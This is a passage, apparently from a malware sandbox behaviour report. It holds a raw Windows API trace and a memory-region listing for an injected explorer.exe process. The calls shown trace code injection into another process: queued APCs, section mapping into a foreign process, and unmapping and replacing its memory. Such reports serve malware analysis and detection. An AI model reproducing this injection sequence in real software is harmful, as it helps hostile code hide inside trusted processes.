[23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x11, [66]=0xe1, [67]=0x3, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x11, [74]=0xe1, [75]=0x3, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x1, SegGs=0x0, SegFs=0x2514900, SegEs=0x0, SegDs=0x28f588, Edi=0x0, Esi=0x100ec, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0xff0e5b60, SegCs=0x7fe, EFlags=0x7, Esp=0x0, SegSs=0x3eab150, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x1, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0xa8, [46]=0x61, [47]=0x7, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x20, [213]=0x10, [214]=0x49, [215]=0x2, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x1, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x58, [245]=0xc1, [246]=0x4e, [247]=0x2, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x96, [261]=0x23, [262]=0xd2, [263]=0xfe, [264]=0xfe, [265]=0x7, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0263.206] NtQueueApcThread (ThreadHandle=0x90, ApcRoutine=0x761a909, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0263.210] NtResumeThread (in: ThreadHandle=0x90, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0263.336] NtClose (Handle=0x8c) returned 0x0 [0263.336] NtClose (Handle=0x90) returned 0x0 [0263.337] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x32e03c | out: BaseAddress=0x32e03c*=0x76b00000) returned 0x0 [0264.694] PostThreadMessageW (idThread=0x458, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0264.697] NtDelayExecution (Alertable=0, Interval=0x32e0b4*=-30000000) returned 0x0 [0267.732] NtReadVirtualMemory (in: ProcessHandle=0x40, BaseAddress=0x7660000, Buffer=0x32e0d8, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x32e0d8*, NumberOfBytesRead=0x0) returned 0x0 [0267.732] NtClose (Handle=0x40) returned 0x0 [0267.732] NtOpenProcess (in: ProcessHandle=0x32f1b4, DesiredAccess=0x438, ObjectAttributes=0x32ea74*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x32ea48*(UniqueProcess=0x350, UniqueThread=0x0) | out: ProcessHandle=0x32f1b4*=0x40) returned 0x0 [0267.735] NtOpenThread (in: ThreadHandle=0x32f1b8, DesiredAccess=0x1a, ObjectAttributes=0x32ea74, ClientId=0x32ea40*(UniqueProcess=0x0, UniqueThread=0x5c4) | out: ThreadHandle=0x32f1b8*=0xa0) returned 0x0 [0267.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ipconfig.exe", NtPathName=0x32e078, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ipconfig.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0267.735] NtCreateFile (in: FileHandle=0x32e098, DesiredAccess=0x120089, ObjectAttributes=0x32e060*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ipconfig.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x32e080, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x32e098*=0xa4, IoStatusBlock=0x32e080*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0267.735] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x494f38) returned 1 [0267.735] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x32e080, FileInformation=0x32dfd8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x32e080, FileInformation=0x32dfd8) returned 0x0 [0267.735] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x6e00) returned 0x494f38 [0267.739] NtReadFile (in: FileHandle=0xa4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x32e080, Buffer=0x494f38, BufferLength=0x6a00, ByteOffset=0x32dff0*=0, Key=0x0 | out: IoStatusBlock=0x32e080, Buffer=0x494f38*) returned 0x0 [0267.740] NtClose (Handle=0xa4) returned 0x0 [0267.741] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa001) returned 0x49bd40 [0267.741] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x494f38) returned 1 [0267.741] NtQueryInformationProcess (in: ProcessHandle=0x40, ProcessInformationClass=0x0, ProcessInformation=0x32e3e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x32e3e4, ReturnLength=0x0) returned 0x0 [0267.741] NtReadVirtualMemory (in: ProcessHandle=0x40, BaseAddress=0x7efde008, Buffer=0x32efa8, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x32efa8*, NumberOfBytesRead=0x0) returned 0x0 [0267.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x32ea8c*=0x20000, RegionSize=0x32ea90, FreeType=0x8000) returned 0x0 [0267.742] NtReadVirtualMemory (in: ProcessHandle=0x40, BaseAddress=0x680000, Buffer=0x49bd40, NumberOfBytesToRead=0xa000, NumberOfBytesRead=0x0 | out: Buffer=0x49bd40*, NumberOfBytesRead=0x0) returned 0x0 [0267.742] NtCreateSection (in: SectionHandle=0x32f244, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x32ea98, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x32f244*=0xa4) returned 0x0 [0267.742] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x32f240*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32ea98*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32f240*=0x330000, SectionOffset=0x0, ViewSize=0x32ea98*=0x29000) returned 0x0 [0267.743] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0x40, BaseAddress=0x32ed00*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32ef2c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32ed00*=0x70000, SectionOffset=0x0, ViewSize=0x32ef2c*=0x29000) returned 0x0 [0267.744] NtCreateSection (in: SectionHandle=0x32efa0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x32eaa8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x32efa0*=0xa8) returned 0x0 [0267.744] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0xffffffff, BaseAddress=0x32efa4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32eaa8*=0xa000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32efa4*=0x20000, SectionOffset=0x0, ViewSize=0x32eaa8*=0xa000) returned 0x0 [0267.745] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x49bd40) returned 1 [0267.749] NtUnmapViewOfSection (ProcessHandle=0x40, BaseAddress=0x680000) returned 0x0 [0267.750] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0x40, BaseAddress=0x32efa8*=0x680000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32f1d4*=0xa000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32efa8*=0x680000, SectionOffset=0x0, ViewSize=0x32f1d4*=0xa000) returned 0x0 [0267.756] NtResumeThread (in: ThreadHandle=0xa0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0267.758] ExitProcess (uExitCode=0x0) Thread: id = 73 os_tid = 0x5b0 Process: id = "9" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x5a03000" os_pid = "0x454" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x440" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed78" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10104 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10105 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10106 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10107 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10108 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10109 start_va = 0xc0000 end_va = 0xc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 10110 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10111 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10112 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 10113 start_va = 0x1f0000 end_va = 0x1fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 10114 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 10115 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10116 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10117 start_va = 0x2d0000 end_va = 0x2d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 10118 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 10119 start_va = 0x2f0000 end_va = 0x2f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 10120 start_va = 0x300000 end_va = 0x319fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10121 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 10122 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 10123 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 10124 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 10125 start_va = 0x450000 end_va = 0x5d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 10126 start_va = 0x5e0000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 10127 start_va = 0x770000 end_va = 0x1b6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 10128 start_va = 0x1b70000 end_va = 0x1b81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 10129 start_va = 0x1b90000 end_va = 0x1b92fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 10130 start_va = 0x1ba0000 end_va = 0x1ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 10131 start_va = 0x1bb0000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 10132 start_va = 0x1c10000 end_va = 0x1c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 10133 start_va = 0x1c20000 end_va = 0x1c21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c20000" filename = "" Region: id = 10134 start_va = 0x1c30000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 10135 start_va = 0x1cb0000 end_va = 0x1d0bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 10136 start_va = 0x1d10000 end_va = 0x1d11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 10137 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 10138 start_va = 0x1da0000 end_va = 0x1e7efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001da0000" filename = "" Region: id = 10139 start_va = 0x1e80000 end_va = 0x214efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10140 start_va = 0x2150000 end_va = 0x2151fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 10141 start_va = 0x2160000 end_va = 0x2162fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 10142 start_va = 0x2170000 end_va = 0x2170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 10143 start_va = 0x2180000 end_va = 0x21b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 10144 start_va = 0x21c0000 end_va = 0x21c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 10145 start_va = 0x21d0000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 10146 start_va = 0x2250000 end_va = 0x22cdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 10147 start_va = 0x22d0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 10148 start_va = 0x23d0000 end_va = 0x23d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 10149 start_va = 0x23e0000 end_va = 0x23e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 10150 start_va = 0x23f0000 end_va = 0x2409fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 10151 start_va = 0x2410000 end_va = 0x2413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 10152 start_va = 0x2420000 end_va = 0x2423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 10153 start_va = 0x2430000 end_va = 0x2430fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 10154 start_va = 0x2440000 end_va = 0x2440fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 10155 start_va = 0x2450000 end_va = 0x2450fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 10156 start_va = 0x2460000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 10157 start_va = 0x2490000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10158 start_va = 0x2590000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 10159 start_va = 0x2790000 end_va = 0x2790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 10160 start_va = 0x27a0000 end_va = 0x27a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10161 start_va = 0x27b0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 10162 start_va = 0x27e0000 end_va = 0x27e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10163 start_va = 0x27f0000 end_va = 0x2855fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 10164 start_va = 0x2860000 end_va = 0x2861fff monitored = 1 entry_point = 0x0 